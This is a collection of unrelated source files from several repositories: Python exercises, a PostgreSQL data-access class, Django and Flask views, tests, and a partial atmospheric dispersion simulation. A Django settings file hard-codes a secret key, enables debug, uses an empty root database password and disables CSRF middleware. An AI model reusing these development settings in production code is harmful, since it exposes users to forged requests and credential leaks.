stuff = {'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12}
def displayInventory(inventory):
    """Print every item with its count, followed by the grand total."""
    print('Inventory:')
    grand_total = sum(inventory.values())
    for item, count in inventory.items():
        print(str(count) + ' ' + item)
    print('Total number of items: ' + str(grand_total))
# Show the starting inventory, then demonstrate adding loot.
displayInventory(stuff)
print('\n\n\n')
# Items dropped by the dragon; duplicates accumulate in the counts.
dragonLoot = ['gold coin', 'dagger', 'gold coin', 'gold coin', 'ruby']
def addToInventory(inventory, addedItems):
    """Add one unit of each listed item to inventory (mutated in place) and return it."""
    for item in addedItems:
        inventory[item] = inventory.get(item, 0) + 1
    return inventory
# Demo: merge the dragon's loot into a small inventory and display it.
inv = {'gold coin': 42, 'rope': 1}
dragonLoot = ['gold coin', 'dagger', 'gold coin', 'gold coin', 'ruby']
inv = addToInventory(inv, dragonLoot)
displayInventory(inv)
|
[
"32727912+DanielNoble@users.noreply.github.com"
] |
32727912+DanielNoble@users.noreply.github.com
|
621a1b4889980fc7004bd33bf26646aa9958a3c0
|
d06492e426c5ce9030605d327acd462418f07045
|
/models/book.py
|
bb53658670dfe89e6f1d6320362a0e70dda4c253
|
[] |
no_license
|
olawale-kareem/Reader
|
688723fcf12c35188c0e864f566d0e96aa3f4fed
|
0d678bbf52a1c0b4ea8f9527e214c86a1903c047
|
refs/heads/master
| 2023-08-22T23:07:23.314852
| 2021-08-14T17:19:41
| 2021-08-14T17:19:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,794
|
py
|
import psycopg2
from psycopg2 import DatabaseError as Error
class Book:
    """Data-access helper for the `books` table of the local `test_script` DB."""

    def __init__(self):
        # BUG FIX: the original called connect_db() twice, opening a second
        # connection (used only for its cursor) that was never closed.
        # Open one connection and take the cursor from it.
        self.connection = self.connect_db()
        self.cursor = self.connection.cursor()
        self.schema_file = '/Users/mac/week-6-assignment-olawale-kareem/schema.sql'
        self.seeder_file = '/Users/mac/week-6-assignment-olawale-kareem/seeder.sql'

    def connect_db(self):
        """Open and return a connection to the local PostgreSQL server.

        NOTE(review): on failure this returns an error *string* instead of a
        connection, which then makes __init__ fail with a confusing
        AttributeError on .cursor(); consider raising instead.
        """
        try:
            connection = psycopg2.connect(user='mac', password=None, host='127.0.0.1', port='5432',
                                          database='test_script')
            return connection
        except (Exception, Error) as err:
            return f'Error while connecting to the PostgreSQL {err}'

    def load_schema_file(self):
        """Execute schema.sql to (re)create the tables."""
        try:
            schema_file = open(self.schema_file, 'r')
            schema_file_content = schema_file.readlines()
            formatted_schema_file = ''.join(schema_file_content)
            self.cursor.execute(formatted_schema_file)
            self.connection.commit()
            schema_file.close()
            return "Tables created successfully in PostgreSQL"
        except (Exception, Error) as err:
            return f'Error while connecting to the PostgreSQL {err}'

    def load_seeder_file(self):
        """Execute seeder.sql to populate the tables."""
        try:
            seeder_file = open(self.seeder_file, 'r')
            seeder_file_content = seeder_file.readlines()
            formatted_seeder_file = ''.join(seeder_file_content)
            self.cursor.execute(formatted_seeder_file)
            self.connection.commit()
            seeder_file.close()
            return "Tables populated successfully in PostgreSQL"
        except (Exception, Error) as err:
            return f'Error while connecting to the PostgreSQL {err}'

    def display_table_content(self):
        """Print and return every row of the books table."""
        self.cursor.execute('SELECT * FROM books')
        db_response = self.cursor.fetchall()
        print(
            f'-------------------------------------------- Table:books ---------------------------------------------\n')
        for row in db_response:
            print(row, '\n')
        return db_response

    def all(self, id):
        """Print and return all books belonging to user `id`."""
        # Parameterized query: avoids SQL injection via the id argument.
        self.cursor.execute('SELECT * FROM books WHERE user_id = %s;', (id,))
        db_response = self.cursor.fetchall()
        for row in db_response:
            print(row, '\n')
        return db_response

    def get(self, book_id):
        """Print and return a single book row by primary key (or None)."""
        self.cursor.execute('SELECT * FROM books WHERE id = %s', (book_id,))
        db_response = self.cursor.fetchone()
        print(db_response)
        return db_response

    def create(self, *args):
        """Insert one row; args = (id, user_id, name, pages, created_at, updated_at)."""
        print('Book table before creating record')
        self.display_table_content()
        print('Table after creating record:')
        # Parameterized insert instead of interpolating the args tuple into SQL.
        self.cursor.execute(
            'INSERT INTO books (id, user_id, name, pages, created_at, updated_at) '
            'VALUES (%s, %s, %s, %s, %s, %s)', args)
        self.connection.commit()
        count = self.cursor.rowcount
        self.display_table_content()
        print(count, "Record created successfully in books table")

    def update(self, id, *args):
        """Update the row with primary key `id`; args = (id, name, pages, created_at, updated_at)."""
        print('Table before updating record')
        print(self.get(id))
        print('Table after updating record')
        self.cursor.execute(
            'UPDATE books SET (id, name, pages, created_at, updated_at) = (%s, %s, %s, %s, %s) '
            'WHERE id = %s', tuple(args) + (id,))
        self.connection.commit()
        count = self.cursor.rowcount
        print(self.get(id))
        print(count, "Record updated successfully in users table")

    def destroy(self, id):
        """Delete the row with primary key `id`."""
        print('Books table before deleting record')
        self.display_table_content()
        print('Table after deleting record:')
        self.cursor.execute('DELETE FROM books WHERE id = %s', (id,))
        self.connection.commit()
        count = self.cursor.rowcount
        self.display_table_content()
        print(count, "Record deleted successfully in books table")

    def close_db_connections(self):
        """Close the cursor and connection if a connection was established."""
        if self.connection:
            self.cursor.close()
            self.connection.close()
            print('PostgreSQL connection is closed')
if __name__ == '__main__':
    # Demo driver: build the schema, seed the table, show its content, then
    # always close the connection.
    try:
        book = Book()
        print(book.load_schema_file())
        print(book.load_seeder_file())
    except Exception as err:
        print("Sorry! we couldn't connect to the db, load schema and seed the table for operations", err)
    else:
        book.display_table_content()
        # book.all(6)
        # book.get(10)
        # book.create(16, 3, 'Shuffletag', 638, '2021/4/1', '2021/7/27')
        # book.update(1 , 1, 'Purpose', 500, '2019-06-14', '2021-01-28')
        # book.destroy(10)
    finally:
        book.close_db_connections()
|
[
"olawale.kareem@decagon.dev"
] |
olawale.kareem@decagon.dev
|
653f6a0d408c0ad15a8e7355338bac74a7866aed
|
7e8cb602f8940e88187f46d184abd27233f845f9
|
/pages/item_page.py
|
7ba8332eee0e4fade97b63818f42e33abc1999e8
|
[] |
no_license
|
echpoch2/luchTests
|
9ba815e0ae207fbeabeb3989fa4e26a329cc56c9
|
c9b597a1c71e0b7ef80bca06a75bfa9dde918e5f
|
refs/heads/main
| 2023-02-06T02:31:23.327729
| 2020-12-30T06:18:50
| 2020-12-30T06:18:50
| 316,919,479
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 522
|
py
|
from .base_page import BasePage
from .locatorsItemPage import ItemPageLocators
from .locatorsCartPage import CartLocators
class ItemPage(BasePage):
    """Page object for a single item/product page."""

    def add_item_to_cart(self):
        """Click the add-to-cart button on the item page."""
        self.browser.find_element(*ItemPageLocators.CART_BUTTON).click()

    def get_item_price(self):
        """Return the element displaying the cart's total price."""
        return self.browser.find_element(*CartLocators.TOTAL_PRICE)

    def should_be_login_link(self):
        """Assert the total-price element is present on the page."""
        assert self.is_element_present(*CartLocators.TOTAL_PRICE), "Login link is not presented"
|
[
"nice.naybich@gmail.com"
] |
nice.naybich@gmail.com
|
68fac6704815a22f20561049ae4d6538d0e45b93
|
9dbfa8251b8aa3ea4bec1fe34dcf4e6ce9b14c8f
|
/heytest/api/views/domingos.py
|
31ae4aa0a6f115221ab51d77b4f44635905d80aa
|
[] |
no_license
|
OOSSGL/heytest
|
0d1dbcdc32b630b24bf629c3ccabe35fa6599dc0
|
060f6ada72dbe82d2d7587ca9eec3a90cfce79eb
|
refs/heads/master
| 2022-11-16T00:16:55.886244
| 2020-07-14T19:47:16
| 2020-07-14T19:47:16
| 278,745,134
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 997
|
py
|
from django.shortcuts import render
from rest_framework.decorators import api_view
from ..serializers import PruebaSerializer
from rest_framework.response import Response
# Created the objetc test
# Created the objetc test
class Prueba(object):
    """Simple value object holding a test's name, description and result."""
    def __init__(self, name, description, result):
        self.name = name
        self.description = description
        self.result = result
@api_view(['GET'])
def getAnswer(request):
    # Smoke-test endpoint: serialize a fixed Prueba object and return it.
    prueba = Prueba(
        name="Prueba",
        description="Esto es una prueba para ver si funciona",
        result="IT WORKS!")
    serializer = PruebaSerializer(prueba)
    return Response(serializer.data)
@api_view(['GET'])
def getDomingos(request):
    # Returns the "how many months started on a Sunday" puzzle statement;
    # the result field is a placeholder until the puzzle is solved.
    prueba = Prueba(
        name="¿Cuántos Domingos?",
        description="¿Durante el siglo 20 (1 de enero de 1901 hasta 31 de diciembre de "
                    + "2000), cuántos meses han empezado un domingo?",
        result="To be discovered")
    serializer = PruebaSerializer(prueba)
    return Response(serializer.data)
|
[
"oossgl@gmail.com"
] |
oossgl@gmail.com
|
049a732270d07ef3dce34a06bbabc393e05c27c3
|
470d12afaff0c6680bf2385ee244f2fbe78c81fd
|
/testing/urls.py
|
4fd8f1e4a211aa72050a4095ab49c9fa2b9d2070
|
[] |
no_license
|
stephbeaird/login
|
45ef8d848c013867e38e0c96a205b5ae45b6e58d
|
ae311f2465a47f15758c6c65c9c7adb4de18188d
|
refs/heads/master
| 2021-08-15T01:42:33.811426
| 2017-11-17T05:11:56
| 2017-11-17T05:11:56
| 111,060,925
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 874
|
py
|
"""testing URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    # Every remaining URL is delegated to the first_app URLconf.
    url(r'^', include('apps.first_app.urls'))
    # url(r'create$', include('first_app/login.html'))
]
|
[
"stephaniebeaird@Stephanies-MacBook-Pro.local"
] |
stephaniebeaird@Stephanies-MacBook-Pro.local
|
7f0ca41d257a38b4fe60b4414053bdc91b331f50
|
727725607b0b50f7ec659295c21720e9cf1873f4
|
/ask/ask/settings.py
|
67189e948b39307f5115381eef5ee36faf536f90
|
[] |
no_license
|
sarnazi/stepic_web_project5
|
64f93b32f589a99494005d9c7a8f14c7bcad3fc8
|
40a14bb734c730eaf47f5fd4d5836b200657337c
|
refs/heads/master
| 2020-06-15T19:56:41.166431
| 2016-12-13T11:37:25
| 2016-12-13T11:37:25
| 75,266,749
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,241
|
py
|
"""
Django settings for ask project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '0sk@ko^ur8&&!inzcs3s%v01djwo7#*(gs#5067r*$$))*%rer'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'autofixture',
'qa',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'ask.urls'
WSGI_APPLICATION = 'ask.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
    'default': {
        # 'ENGINE': 'django.db.backends.sqlite3',
        # 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
        'ENGINE': 'django.db.backends.mysql',
        'NAME': 'TEST',
        'USER': 'root',
        # NOTE(review): empty root password is acceptable only for local
        # development; must not be used in production.
        'PASSWORD': '',
        'HOST': 'localhost',
        'PORT': '',
    }
}
#AUTH_USER_MODEL = 'profile.user'
#AUTH_PROFILE_MODULE = 'qa.UserProfile'
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
|
[
"sarnazi@mail.ru"
] |
sarnazi@mail.ru
|
bb58bfb6ff59c7cd398923d1965a866fd2b2066c
|
5899c0d62f3a1eb8aa854016365e3608c6aec037
|
/pyfire/tests/auth/test_registry.py
|
0c01883a419425d2b929196ab8538afda8b770ca
|
[
"BSD-3-Clause"
] |
permissive
|
IgnitedAndExploded/pyfire
|
288c67b95a8e904eb6da1bb443dd0086c171dbbb
|
2d84994593b9ac9cbab21dea24c4303e06b351fc
|
refs/heads/master
| 2021-06-10T16:41:46.754130
| 2011-11-27T15:59:20
| 2011-11-27T15:59:20
| 2,096,184
| 4
| 1
|
NOASSERTION
| 2021-05-22T21:30:24
| 2011-07-24T10:35:26
|
Python
|
UTF-8
|
Python
| false
| false
| 3,834
|
py
|
# -*- coding: utf-8 -*-
"""
pyfire.tests.auth.test_registry
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests builtin auth handling and backends
:copyright: 2011 by the pyfire Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from base64 import b64encode
import xml.etree.ElementTree as ET
import warnings
from pyfire.tests import PyfireTestCase
from pyfire.auth.registry import ValidationRegistry
from pyfire.auth.backends import DummyTrueValidator, DummyFalseValidator, \
InvalidAuthenticationError
class DummyTestValidator(DummyTrueValidator):
    """Spy validator recording whether validation/shutdown hooks were called.

    BUG FIX: ``__init__`` previously called ``super(DummyTrueValidator,
    self).__init__()``, naming the *base* class and thereby skipping
    DummyTrueValidator's own ``__init__`` and invoking its parent's instead.
    The first argument to super() must be the defining class itself.
    """

    def __init__(self):
        super(DummyTestValidator, self).__init__()
        self._shutdown = False    # flipped to True by shutdown()
        self._validated = False   # flipped to True by either validate hook

    def validate_userpass(self, username, password):
        self._validated = True

    def validate_token(self, token):
        self._validated = True

    def shutdown(self):
        self._shutdown = True
class TestValidationRegistry(PyfireTestCase):
    """Exercises ValidationRegistry registration, shutdown and validation fan-out."""

    def setUp(self):
        # Fresh registry per test so handlers don't leak between cases.
        self.registry = ValidationRegistry()

    def tearDown(self):
        del self.registry

    def test_registertwice(self):
        # Registering the same name twice must raise AttributeError.
        handler = DummyFalseValidator()
        self.registry.register('dummy', handler)
        with self.assertRaises(AttributeError) as cm:
            self.registry.register('dummy', handler)

    def test_unregister_bad(self):
        # Unregistering a name that was never registered must raise.
        with self.assertRaises(AttributeError) as cm:
            self.registry.unregister('dummy')

    def test_unregister_good(self):
        # Register-then-unregister round trip must succeed silently.
        handler = DummyFalseValidator()
        self.registry.register('dummy', handler)
        self.registry.unregister('dummy')

    def test_unregister_shutdown(self):
        # Unregistering must invoke the handler's shutdown() hook.
        handler = DummyTestValidator()
        self.registry.register('dummy', handler)
        self.assertFalse(handler._shutdown)
        self.registry.unregister('dummy')
        self.assertTrue(handler._shutdown)

    def test_validation_userpass_fail(self):
        # When every handler rejects, all handlers are consulted and the
        # registry raises InvalidAuthenticationError.
        handler1 = DummyFalseValidator()
        self.registry.register('dummy', handler1)
        handler2 = DummyTestValidator()
        self.registry.register('tester', handler2)
        self.assertFalse(handler2._validated)
        with self.assertRaises(InvalidAuthenticationError) as cm:
            self.registry.validate_userpass('user', 'pass')
        self.assertTrue(handler2._validated)

    def test_validation_userpass_success(self):
        # The first accepting handler's name is returned and later handlers
        # are not consulted.
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            handler1 = DummyTrueValidator()
            self.registry.register('dummy', handler1)
            handler2 = DummyTestValidator()
            self.registry.register('tester', handler2)
            self.assertFalse(handler2._validated)
            self.assertEqual(self.registry.validate_userpass('user', 'pass'), 'dummy')
            self.assertFalse(handler2._validated)

    def test_validation_token_fail(self):
        # Token path: all handlers consulted, failure raises.
        handler1 = DummyFalseValidator()
        self.registry.register('dummy', handler1)
        handler2 = DummyTestValidator()
        self.registry.register('tester', handler2)
        self.assertFalse(handler2._validated)
        with self.assertRaises(InvalidAuthenticationError) as cm:
            self.registry.validate_token('token')
        self.assertTrue(handler2._validated)

    def test_validation_token_success(self):
        # Token path: first accepting handler wins.
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            handler1 = DummyTrueValidator()
            self.registry.register('dummy', handler1)
            handler2 = DummyTestValidator()
            self.registry.register('tester', handler2)
            self.assertFalse(handler2._validated)
            self.assertEqual(self.registry.validate_token('token'), 'dummy')
            self.assertFalse(handler2._validated)
|
[
"mail@markus-ullmann.de"
] |
mail@markus-ullmann.de
|
365349fc60bd1251a6bd1ccf3014d2a1f36ad0a1
|
6aa2c826e379cb6bed8d3311927c340204feeed3
|
/app/api/transcribe.py
|
eae8a541104d515f2bd2c7cef065c51e222ddbb2
|
[] |
no_license
|
WillSmithTE/transcribe
|
e80d9fe815b953fddf24b26667af1b7ebcac208f
|
00822a4188292d9c671c61a6c1dca5fadab732ae
|
refs/heads/master
| 2023-03-04T05:49:40.705926
| 2023-02-25T23:35:03
| 2023-02-25T23:35:03
| 254,513,195
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
from flask import Blueprint, request
from app.service.gcloud import main, transcribeLocal, generateTranscript
from app.service.security import Forbidden, isValid, checkValid
transcribe_api = Blueprint('transcribe_api', __name__)  # mounted by the application factory


@transcribe_api.route('/transcribe', methods=['GET'])
def transcribe():
    """Transcribe the remote audio file named by the `url` query parameter."""
    return main(request.args.get('url'))


@transcribe_api.route('/transcribeLocal', methods=['GET'])
def transcribeLocalApi():
    """Transcribe a local file named by the `filename` query parameter."""
    return transcribeLocal(request.args.get('filename'))


@transcribe_api.route('/transcribeHosted', methods=['GET'])
def transcribeHostedApi():
    """Transcribe a file already hosted in the GCS bucket; `url` is the
    object path inside `transcriptions_willsmithte`."""
    return generateTranscript('gs://transcriptions_willsmithte/' + request.args.get('url'))
|
[
"willsmithte@gmail.com"
] |
willsmithte@gmail.com
|
2eca32fb896939418d73ef6d34691efd92662494
|
9788bb62a4cdb894f8a13c0facb652d7a3e15fa8
|
/login_app/views.py
|
a849e2dd65d7fca649f8840f6d86cc09f8801281
|
[] |
no_license
|
leongus1/favorite_books
|
f44241f0bdaf9f8db60c1d974e4349928acc7779
|
b1e222df54a23ead22a51f97268fda1eedcf6d3c
|
refs/heads/master
| 2023-01-10T05:55:24.327999
| 2020-10-30T01:52:14
| 2020-10-30T01:52:14
| 308,225,425
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,058
|
py
|
from django.shortcuts import render, redirect
from login_app.models import Users
import bcrypt
from django.contrib import messages
# Create your views here.
def index(request):
    """Render the login/registration landing page."""
    return render(request, 'index.html')
def check_log(request):
    """Validate a login POST.

    Looks the account up by email, compares the bcrypt hash, seeds the
    session and redirects to /books on success; redirects back to / with a
    session flag describing the failure otherwise.
    """
    if len(Users.objects.filter(email=request.POST['email']))==0:
        # no account for this address — flag it for the template to display
        request.session['invalid_user_email']="No account with this email address"
        return redirect('/')
    else:
        hash = Users.objects.get(email=request.POST['email']).password_hash
        # checkpw re-hashes the candidate with the stored salt and compares
        if bcrypt.checkpw(request.POST['pw'].encode(), hash.encode()):
            user1 = Users.objects.get(email=request.POST['email'])
            request.session['pw_match'] = 'password match'
            request.session['user_id'] = user1.id
            request.session['name']=user1.first_name
            return redirect ('/books')
        else:
            print('password doesnt match')
            request.session['bad_pw']="Invalid Password"
            return redirect('/')
#create or update records
def register(request):
    """Create a new user account from the registration POST and log them in.

    Validates via the model manager, rejects duplicate emails, stores only a
    bcrypt hash of the password, and seeds the session. Redirects to '/'
    with flashed errors on failure, or to '/books' on success.
    """
    errors = Users.objects.user_validator(request.POST)
    if len(Users.objects.filter(email=request.POST['email'])) > 0:
        errors['acct_status'] = "There is already an account using this email address."
    if errors:
        for key, values in errors.items():
            messages.error(request, values)
        return redirect('/')
    else:
        pw_hash = bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt()).decode()
        Users.objects.create(first_name=request.POST['first_name'], last_name=request.POST['last_name'], email=request.POST['email'], password_hash=pw_hash)
        request.session['acct_status'] = 'Account successfully created'
        # fixed: was a duplicated `user1 = user1 = ...` assignment
        user1 = Users.objects.get(email=request.POST['email'])
        request.session['user_id'] = user1.id
        request.session['name'] = user1.first_name
        return redirect('/books')
def logout(request):
    """Drop the entire session (flush also regenerates the session key) and go home."""
    request.session.flush()
    return redirect('/')
|
[
"leongus1@gmail.com"
] |
leongus1@gmail.com
|
565d99a79d80d15950a7a1a6508883cf2bfe05a7
|
00335788cd56ede0bda4e1dfb32437bfe1ee05e3
|
/tests/conftest.py
|
653c3397a892c8fcde4b9171ffce57157d2494a9
|
[] |
no_license
|
zoglam/candy_delivery_api
|
bb308bab813e1cef3ba8d010424a5d7c91318726
|
1621bb8bb306b327694f885c72e5110327c7b5a7
|
refs/heads/master
| 2023-07-05T21:46:06.651728
| 2021-03-29T19:06:57
| 2021-03-29T19:06:57
| 344,929,705
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,392
|
py
|
import warnings
import pytest
import docker as libdocker
from asgi_lifespan import LifespanManager
from fastapi import FastAPI
from httpx import AsyncClient
@pytest.fixture(scope="session")
def docker() -> libdocker.APIClient:
    """Session-scoped low-level Docker API client, closed at session end."""
    with libdocker.APIClient(version="auto") as client:
        yield client


@pytest.fixture(scope="session", autouse=True)
def mariadb_server(docker: libdocker.APIClient) -> None:
    """Placeholder for a MariaDB test container.

    Currently it only suppresses DeprecationWarnings; the container and
    migration hooks are still commented out below.
    """
    warnings.filterwarnings("ignore", category=DeprecationWarning)
    yield
    return


# @pytest.fixture(autouse=True)
# async def apply_migrations(mariadb_server: None) -> None:
#     alembic.config.main(argv=["upgrade", "head"])
#     yield
#     alembic.config.main(argv=["downgrade", "base"])


@pytest.fixture
# def app(apply_migrations: None) -> FastAPI:
def app(mariadb_server: None) -> FastAPI:
    """The FastAPI application under test; imported lazily to avoid import-time side effects."""
    from app.main import app  # local import for testing purpose
    return app


@pytest.fixture
async def initialized_app(app: FastAPI) -> FastAPI:
    """The app with startup/shutdown (lifespan) events actually executed."""
    async with LifespanManager(app):
        yield app


# @pytest.fixture
# def pool(initialized_app: FastAPI) -> Pool:
#     return initialized_app.state.pool


@pytest.fixture
async def client(initialized_app: FastAPI) -> AsyncClient:
    """In-process async HTTP client bound to the initialized app (no real network)."""
    async with AsyncClient(
        app=initialized_app,
        base_url="http://localhost",
        headers={"Content-Type": "application/json"},
    ) as client:
        yield client
|
[
"anzoor1998@gmail.com"
] |
anzoor1998@gmail.com
|
48dc205636e176aa2f4eb6f1bb7f6e4cb16c83b2
|
b2cda2ad7801184d0a42c588e4b4c1530c2225e5
|
/dipl-DVD-ROM/Asim/asim/simulation/simple.py
|
ac1fde0b456031c2e6ca9c3109b010a255675cc9
|
[] |
no_license
|
strohel/works
|
90777df7a6d7d57e2108ab3500cb7266460b53c2
|
4abb93baab1d89e2275af6ec04e0b2e4351a7e76
|
refs/heads/master
| 2021-01-01T18:48:50.886333
| 2014-06-03T21:32:26
| 2014-06-03T21:32:26
| 17,958,017
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,683
|
py
|
#!/usr/bin/env python
"""Run a simulation of an atmospheric radioactive realease using the puff model"""
import matplotlib.pyplot as plt
import numpy as np
import pybayes.wrappers._numpy as nw
import scipy.io
import cProfile
import glob
import os.path
import pstats
import subprocess
import time
from asim.dispmodel.iface import Location, Nuclide, SourceModel, MeteoModel, DispersionModel
from asim.dispmodel.nuclides import db as nuclide_db
from asim.dispmodel.puffmodel import PuffModel
from asim.support.directories import results_dir
from asim.support.plotters import plot_trajectories, plot_contour, plot_stations, plot_map
class StaticCompoLocSourceModel(SourceModel):
    """Source model that provides static implementation of
    :meth:`~asim.dispmodel.iface.SourceModel.inventory` and
    :meth:`~asim.dispmodel.iface.SourceModel.location`.
    """

    def inventory(self):
        # Fixed composition: the release consists of Ar-41 only.
        ret = np.array([nuclide_db["Ar-41"]], dtype=Nuclide)
        return ret

    def location(self):
        # Release point at the grid origin, 50 m above ground.
        return Location(x=0.0, y=0.0, z=50.0)
class SimulatedSourceModel(StaticCompoLocSourceModel):
    """Source model that releases a static, pre-defined amount of radionuclides."""

    def __init__(self, puff_sampling_step, activities):
        """
        :param int puff_sampling_step: interval (seconds) between rate changes
        :param activities: total released activity per time slot, one row per slot
            (the original docstring described a ``time_step``/``rates`` pair
            that does not match these parameters)
        """
        self.puff_sampling_step = puff_sampling_step
        # per-second release rate for each slot
        self.rates = np.asarray(activities) / puff_sampling_step

    def release_rate(self, time):
        """Release rate at ``time``; zero before and after the release window."""
        index = time // self.puff_sampling_step # integer-wise division
        if index >= 0 and index < self.rates.shape[0]:
            return self.rates[index]
        else:
            return np.zeros((self.rates.shape[1])) # rate is zero before and after release
class PasquillsMeteoModel(MeteoModel):
    """Abstract meteo model based on Pasquill's stability category."""

    def __init__(self, stability_category):
        """
        :param int stability_category: Pasquill stability category A=0 ... F=5
        """
        self.stability_category = stability_category
        # mixing-layer height (m) per category A..F
        self.height_per_category = np.array([1300.0, 920.0, 840.0, 500.0, 400.0, 150.0])

    def mixing_layer_height_at(self, loc, time):
        # Height depends only on the stability category, not on loc/time.
        return self.height_per_category[self.stability_category]

    def dispersion_xy(self, loc, time, total_distance):
        """Horizontal dispersion coefficient (empirical power law per category)."""
        sigmaxyA = [1.503, 0.876, 0.659, 0.640, 0.801, 1.294]
        sigmaxyB = [0.833, 0.823, 0.807, 0.784, 0.754, 0.718]
        index = self.stability_category
        if total_distance > 10000.:
            # beyond 10 km the growth is damped to a square-root law
            exponent = sigmaxyB[index] - 0.5
            return (sigmaxyA[index]*10000.**(exponent))*(total_distance**(0.5))
        else:
            return (sigmaxyA[index]*total_distance)**sigmaxyB[index]

    def dispersion_z(self, loc, time, total_distance):
        """Vertical dispersion coefficient (empirical power law per category)."""
        sigmazA = [0.151, 0.127, 0.165, 0.215, 0.264, 0.241]
        sigmazB = [1.219, 1.108, 0.996, 0.885, 0.774, 0.662]
        index = self.stability_category
        return (sigmazA[index]*total_distance)**sigmazB[index]
class StaticMeteoModel(PasquillsMeteoModel):
"""Weather model that returns pre-computed numbers stored in .mat file."""
def __init__(self, meteo_array, stability_category, grid_step_xy = 3, grid_step_time = 3600):
"""
:param string matfile: path to Matlab .mat file with pre-computed grid of wind speed and direction
:param int stability_category: Pasquills statiblity category A=0 ... F=5
"""
PasquillsMeteoModel.__init__(self, stability_category)
self.METEO = np.asarray(meteo_array)
self.grid_step_xy = grid_step_xy
self.grid_step_time = grid_step_time
def wind_speed_at(self, loc, time):
tt = time // self.grid_step_time # integer-wise division.
ws11_0 = self.METEO[tt, 1, 0, 0]
ws12_0 = self.METEO[tt, 1, 0, 0]
ws21_0 = self.METEO[tt, 1, 0, 0]
ws22_0 = self.METEO[tt, 1, 0, 0]
ws11_1 = self.METEO[tt+1, 1, 0, 0]
ws12_1 = self.METEO[tt+1, 1, 0, 0]
ws21_1 = self.METEO[tt+1, 1, 0, 0]
ws22_1 = self.METEO[tt+1, 1, 0, 0]
"""
xgrid = loc.x // self.grid_step_xy + (self.METEO.shape[2]-1)/2.0
x = loc.x % self.grid_step_xy
ygrid = loc.y // self.grid_step_xy + (self.shape[3]-1)/2.0
y = loc.y % self.grid_step_xy
ws11_0 = METEO[tt, 1, xgrid, ygrid]
ws12_0 = METEO[tt, 1, xgrid, ygrid+1]
ws21_0 = METEO[tt, 1, xgrid+1, ygrid]
ws22_0 = METEO[tt, 1, xgrid, ygrid+1]
ws11_1 = METEO[tt+1, 1, xgrid, ygrid]
ws12_1 = METEO[tt+1, 1, xgrid, ygrid+1]
ws21_1 = METEO[tt+1, 1, xgrid+1, ygrid]
ws22_1 = METEO[tt+1, 1, xgrid, ygrid+1]
"""
ws_0 = self._bilinear_interp(ws11_0, ws12_0, ws21_0, ws22_0, 0, 0, self.grid_step_xy, self.grid_step_xy, loc.x, loc.y)
ws_1 = self._bilinear_interp(ws11_1, ws12_1, ws21_1, ws22_1, 0, 0, self.grid_step_xy, self.grid_step_xy, loc.x, loc.y)
coef = float(time % self.grid_step_time) / self.grid_step_time
return coef*(ws_1 - ws_0) + ws_0
def wind_direction_at(self, loc, time):
tt = time // self.grid_step_time # integer-wise division.
wd11_0 = self.METEO[tt, 0, 0, 0]
wd12_0 = self.METEO[tt, 0, 0, 0]
wd21_0 = self.METEO[tt, 0, 0, 0]
wd22_0 = self.METEO[tt, 0, 0, 0]
wd11_1 = self.METEO[tt+1, 0, 0, 0]
wd12_1 = self.METEO[tt+1, 0, 0, 0]
wd21_1 = self.METEO[tt+1, 0, 0, 0]
wd22_1 = self.METEO[tt+1, 0, 0, 0]
"""
xgrid = loc.x // self.grid_step_xy + (self.METEO.shape[2]-1)/2.0
x = loc.x % self.grid_step_xy
ygrid = loc.y // self.grid_step_xy + (self.shape[3]-1)/2.0
y = loc.y % self.grid_step_xy
